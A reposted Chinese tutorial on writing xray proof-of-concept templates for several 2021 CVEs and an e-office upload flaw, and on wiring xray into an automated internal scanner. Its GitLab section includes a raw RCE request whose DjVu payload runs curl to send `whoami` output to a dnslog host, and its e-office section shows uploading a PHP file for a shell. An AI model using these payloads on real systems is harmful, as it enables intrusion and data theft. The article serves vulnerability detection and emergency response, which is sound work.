0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

我的漏洞掃描及安全應(yīng)急之道

jf_Fo0qk3ln ? 來源:FreeBuf.COM ? 2023-09-14 10:42 ? 次閱讀

編寫POC

以xray為例

學(xué)習(xí)文檔

先學(xué)習(xí)下相關(guān)文檔,大家挨個看一遍就行,有個印象即可,不用死記硬背。

如何編寫YAML格式POC

POC語法V2版

如何編寫高質(zhì)量的 poc

BugScan 插件開發(fā)文檔

插件編寫

官方公布最基礎(chǔ)的POC如下

name: poc-yaml-example-com
# 腳本部分
transport: http
rules:
    r1:
        request:
            method: GET
            path: "/"
        expression: |
            response.status==200 && response.body.bcontains(b'Example Domain')
expression:
    r1()
# 信息部分
detail:
    author: name(link)
    links: 
        - http://example.com

編寫編輯器

poc實踐

CVE-2021-3654

路徑處理出了問題,網(wǎng)站域名加上//example.com/%2f..即可進(jìn)行url跳轉(zhuǎn)

直接get請求,所以poc很簡單,有手就行。

name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
  - method: GET
    path: "http://baidu.com/%2f.."
    follow_redirects: false
    expression: |
      response.headers['location']=="http://baidu.com/%2f../"
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://seclists.org/oss-sec/2021/q3/188

CVE-2021-22205

exiftool解析造成的rce
一共發(fā)送2個請求

dff44200-5297-11ee-a25d-92fbcf53809c.jpg

請求1:

GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

獲取csrf-token

請求2:

POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: xxx==
Cookie: xx
Content-Length: 879


------WebKitFormBoundaryIMv3mxRg59TkFSX5
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

AT&TFORM?DJVMDIRM.?F????? !?N????k?D,q?I?n????"?FORM^DJVUINFO
dINCLshared_anno.iffBG44J???7?*?BG44??BG44
FORMDJVIANTaP(metadata
(Copyright "
" . qx{curl `whoami`.dnslog.cn} . 
" b ") )

------WebKitFormBoundaryIMv3mxRg59TkFSX5--

上傳圖片觸發(fā)rce。

由于xray目前支持的編碼解碼有限,不支持hex解碼,所以我們直接寫的簡單點,使用隨機字符進(jìn)行判斷,poc很簡單,有手就行。

name: poc-yaml-gitlab-cve-2021-22205-rce
set:
  r1: randomInt(1, 9999)
  r2: randomInt(1, 9999)
manual: true
transport: http
rules:
  - method: GET
    path: "/users/sign_in"
    expression: response.status == 200
    search: >-
      name="csrf-token" content="(?P.+?)"
  - method: POST
    path: "/uploads/user"
    headers:
      X-CSRF-Token: |-
        {{token}}
      Content-Type: |-
        multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
      Accept: "*/*"
    body: |-
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5
      Content-Disposition: form-data; name="file"; filename="{{r1}}.jpg"
      Content-Type: image/jpeg
      {{r2}}
      ------WebKitFormBoundaryIMv3mxRg59TkFSX5--
    expression: response.body.bcontains(b'Failed to process image')

detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released

CVE-2021-27905

這是SSRF漏洞,需要使用反連平臺,加上reverse的即可,官方寫的很詳細(xì)了。所以poc很簡單,有手就行。

name: poc-yaml-solr-cve-2021-27905-ssrf
manual: true
transport: http
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: GET
    path: "/solr/admin/cores?indexInfo=false&wt=json"
    expression: |
      response.status == 200
    search: >-
      "name":"(?P.+?)"
  - method: POST
    path: "/solr/{{name}}/replication/?command=fetchindex&masterUrl={{reverseURL}}"
    expression: |
      reverse.wait(5)
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://github.com/murataydemir/CVE-2021-27905

0day應(yīng)急

不管是甲方還是乙方,一旦暴出新漏洞,應(yīng)急顯得非常重要。
大部分人都是直接寫poc批量檢測內(nèi)部應(yīng)用,當(dāng)然我也不例外。

舉個例子:
泛微e-office 文件上傳漏洞風(fēng)險通告(CNVD-2021-49104)

部署靶場環(huán)境

影響版本
泛微e-office V9.0
首先虛擬機安裝下。
e00e5104-5297-11ee-a25d-92fbcf53809c.jpg
安裝完成后,默認(rèn)賬號admin,密碼為空。

POC構(gòu)造

Burpsuite原始包文

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.11:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.11:8080/login.php
Cookie: LOGIN_LANG=cn; PHPSESSID=c57f0b37a12cf9dd61e35b909289d1b9
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 191

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test1.php"
Content-Type: image/jpeg

123

--e64bdf16c554bbc109cecef6451c26a4--

訪問上傳的文件是否生效
e02e7f60-5297-11ee-a25d-92fbcf53809c.jpg

編寫poc

name: poc-yaml-e-office-v9-upload-getshell
manual: true
transport: http
set:
    r1: randomLowercase(8)
rules:
    r1:
        request:
            cache: true
            method: POST
            path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
            headers:
                Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
            body: |-
                --e64bdf16c554bbc109cecef6451c26a4
                Content-Disposition: form-data; name="Filedata"; filename="{{r1}}.php"
                Content-Type: image/jpeg

                {{r1}}
                --e64bdf16c554bbc109cecef6451c26a4--
        expression: response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
    r2:
        request:
            cache: true
            method: GET
            path: /images/logo/logo-eoffice.php
        expression: response.status == 200 && response.body.bcontains(bytes(r1))
expression: r1() && r2()
detail:
    author: test
    links:
        - https://github.com/chaitin/xray/pull/1540/files

XRAY批量

將需要掃描的url寫到url.txt里,然后執(zhí)行如下命令。

./xray_darwin_amd64 webscan --poc "/Users/txf/poc/e-officev9-upload-getshell.yml" --url-file url.txt --html-output result.txt

e04905b0-5297-11ee-a25d-92fbcf53809c.jpg

DIY自動化掃描器

之前看了linglong(一款資產(chǎn)巡航掃描系統(tǒng))的源碼,在他的基礎(chǔ)上重構(gòu)了一些功能。
一起看看我是如何把xray加到自動化掃描器中。

掃描器開關(guān)

在linglong的基礎(chǔ)上,我為掃描器添加了開關(guān)。
e05efa3c-5297-11ee-a25d-92fbcf53809c.jpg
在代碼中定義了一個布爾值來做控制。

端口掃描

跟市面上掃描器意義,使用masscan去掃描存活端口,使用nmap進(jìn)行端口的指紋識別。
原因:

1.Nmap在掃描數(shù)量較大的目標(biāo)時性能緩慢

2.Masscan在高速率的掃描較大端口范圍時結(jié)果不太準(zhǔn)確

web指紋掃描

直接用的開源的識別工具加到代碼里。

漏洞掃描

在進(jìn)行xray漏洞掃描之前,先定義掃描目標(biāo)的格式,代碼如下:
e08746cc-5297-11ee-a25d-92fbcf53809c.jpg

然后調(diào)用cmd終端執(zhí)行xray掃描即可。
e0977092-5297-11ee-a25d-92fbcf53809c.jpg

結(jié)果通知

直接寫一個企業(yè)微信機器人的通知。
e0b13216-5297-11ee-a25d-92fbcf53809c.jpg

當(dāng)然也可以用xray自帶的webhook通知,沒用過,這里感興趣的可以試試。

端口指紋界面:
e0d131ec-5297-11ee-a25d-92fbcf53809c.jpg

漏洞界面:

e0ef4a1a-5297-11ee-a25d-92fbcf53809c.jpg

當(dāng)然如果是企業(yè)自查xray肯定可以開啟掃描,如果是SRC掃描的話不建議開xray去掃描,動靜太大了。

尾聲

如果針對外網(wǎng)掃描的話,建議再加上waf識別,cdn識別,否則效率會很低,還容易被封ip。

總的來說挖掘SRC,更重要的是信息收集。

這就是目前安全應(yīng)急和漏洞掃描的方法,歡迎大家積極交流。

作者:tangxiaofeng7,轉(zhuǎn)載于FreeBuf.COM

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 漏洞掃描
    +關(guān)注

    關(guān)注

    0

    文章

    12

    瀏覽量

    7298
  • PoC
    PoC
    +關(guān)注

    關(guān)注

    1

    文章

    67

    瀏覽量

    20416
  • 編輯器
    +關(guān)注

    關(guān)注

    1

    文章

    797

    瀏覽量

    30929

原文標(biāo)題:干貨|我的漏洞掃描及安全應(yīng)急之道

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描

    本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯 基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描對Linux系統(tǒng)開發(fā)有5年了,近期在blackberry2上移植把玩
    發(fā)表于 04-29 09:59

    安全瀏覽器竟然也被查出高危漏洞?開源安全問題不容忽視

    軟件里包含哪些開源組件,是否存在嚴(yán)重安全隱患。 中國開源安全聯(lián)盟(www.cvecn.com)部分的解決了這些開源漏洞的定位問題。聯(lián)盟在其官網(wǎng)上提供免費二進(jìn)制可執(zhí)行文件掃描服務(wù)??梢詫?/div>
    發(fā)表于 09-05 14:26

    漏洞真實影響分析,終結(jié)網(wǎng)絡(luò)安全的“狼來了”困境

    重要大會前夕接到要求對公司信息安全進(jìn)行治理,從實際上解決以前欠下的安全“債務(wù)”,需要在一周內(nèi)對已有的高危漏洞進(jìn)行修復(fù)。在控制臺上可以看到已經(jīng)掃描出了上萬個軟件
    發(fā)表于 12-25 15:18

    固件漏洞安全問題的解決辦法

    安全性?! ?jù)Gartner數(shù)據(jù),截止2022年,約有70%未執(zhí)行固件升級計劃的組織將由于固件漏洞而遭到入侵。而今年疫情的出現(xiàn)也導(dǎo)致了全球供應(yīng)鏈不斷增加的中短期風(fēng)險?!   」碳?b class='flag-5'>漏洞正逐年增加
    發(fā)表于 09-07 17:16

    一個基于漏洞掃描安全中間件架構(gòu)設(shè)計

    本文結(jié)合漏洞掃描技術(shù)和安全中間件技術(shù),提出了一種基于漏洞掃描安全中間件的系統(tǒng)結(jié)構(gòu)。該系統(tǒng)將
    發(fā)表于 09-03 09:18 ?18次下載

    [代碼整潔之道].(美)馬丁.掃描

    電子發(fā)燒友網(wǎng)站提供《[代碼整潔之道].(美)馬丁.掃描版.txt》資料免費下載
    發(fā)表于 02-06 16:47 ?0次下載

    分解漏洞掃描,什么是漏洞掃描?

    5W2H?分解漏洞掃描 - WHAT WHAT?什么是漏洞掃描? 首先什么是漏洞? 國內(nèi)外各種規(guī)范和標(biāo)準(zhǔn)中關(guān)于
    的頭像 發(fā)表于 10-12 16:38 ?1181次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,什么是<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>?

    分解漏洞掃描,為什么要做漏洞掃描呢?

    5W2H?分解漏洞掃描 - WHY WHY?為什么要做漏洞掃描呢? 降低資產(chǎn)所面臨的風(fēng)險 上文提到漏洞的典型特征:系統(tǒng)的缺陷/弱點、可能被威
    的頭像 發(fā)表于 10-12 16:39 ?1257次閱讀
    分解<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>,為什么要做<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>呢?

    華為云VSS漏洞掃描服務(wù)為你排除Apache log4j2隱患

    華為云VSS漏洞掃描服務(wù)為你排除Apache log4j2隱患 近日Apache Log4j2漏洞持續(xù)發(fā)酵,已成為中國互聯(lián)網(wǎng)2021年年底前最大的安全事件。華為云VSS
    的頭像 發(fā)表于 10-13 13:52 ?918次閱讀
    華為云VSS<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>服務(wù)為你排除Apache log4j2隱患

    XSS漏洞掃描器工具

    XSpear是一款基于RubyGems的的XSS漏洞掃描器。擁有常見的XSS漏洞掃描攻擊測試功能。還可進(jìn)行參數(shù)分析。
    的頭像 發(fā)表于 01-17 09:28 ?1712次閱讀

    市場上可用的十大最佳漏洞掃描工具

    OpenVAS漏洞掃描器是一種漏洞分析工具,由于其全面的特性,可以使用它來掃描服務(wù)器和網(wǎng)絡(luò)設(shè)備。這些掃描器將通過
    的頭像 發(fā)表于 03-08 09:49 ?3868次閱讀

    常見的漏洞掃描工具

    漏洞掃描工具是現(xiàn)代企業(yè)開展?jié)B透測試服務(wù)中必不可少的工具之一,可以幫助滲透測試工程師快速發(fā)現(xiàn)被測應(yīng)用程序、操作系統(tǒng)、計算設(shè)備和網(wǎng)絡(luò)系統(tǒng)中存在的安全風(fēng)險與漏洞,并根據(jù)這些
    的頭像 發(fā)表于 06-28 09:42 ?1534次閱讀
    常見的<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>工具

    最常見的網(wǎng)絡(luò)安全12種漏洞掃描類型

    數(shù)據(jù)庫掃描技術(shù)主要用于評估數(shù)據(jù)庫系統(tǒng)的安全性,該類型會全面查找數(shù)據(jù)庫設(shè)置、訪問控制和存儲數(shù)據(jù)的漏洞,比如不安全的權(quán)限、漏洞注入問題或不
    發(fā)表于 07-12 12:41 ?1303次閱讀
    最常見的網(wǎng)絡(luò)<b class='flag-5'>安全</b>12種<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>類型

    ntopng如何將漏洞掃描與流量監(jiān)控相結(jié)合,以提高網(wǎng)絡(luò)安全

    ntopng為人所知的“身份”是被動流量監(jiān)控。然而,如今的ntopng6.0也進(jìn)化出主動監(jiān)控功能來,漏洞掃描功能便是其中一個。那么漏洞掃描功能是什么?其獨特之處是什么?用戶該如何使用?
    的頭像 發(fā)表于 11-25 08:04 ?321次閱讀
    ntopng如何將<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>與流量監(jiān)控相結(jié)合,以提高網(wǎng)絡(luò)<b class='flag-5'>安全</b>性

    POC管理和漏洞掃描小工具

    本工具是采用javafx編寫,使用sqllite進(jìn)行poc儲存的poc管理和漏洞掃描集成化工具。主要功能是poc管理,并且采用多線程進(jìn)行漏洞掃描。
    的頭像 發(fā)表于 01-09 11:01 ?595次閱讀
    POC管理和<b class='flag-5'>漏洞</b><b class='flag-5'>掃描</b>小工具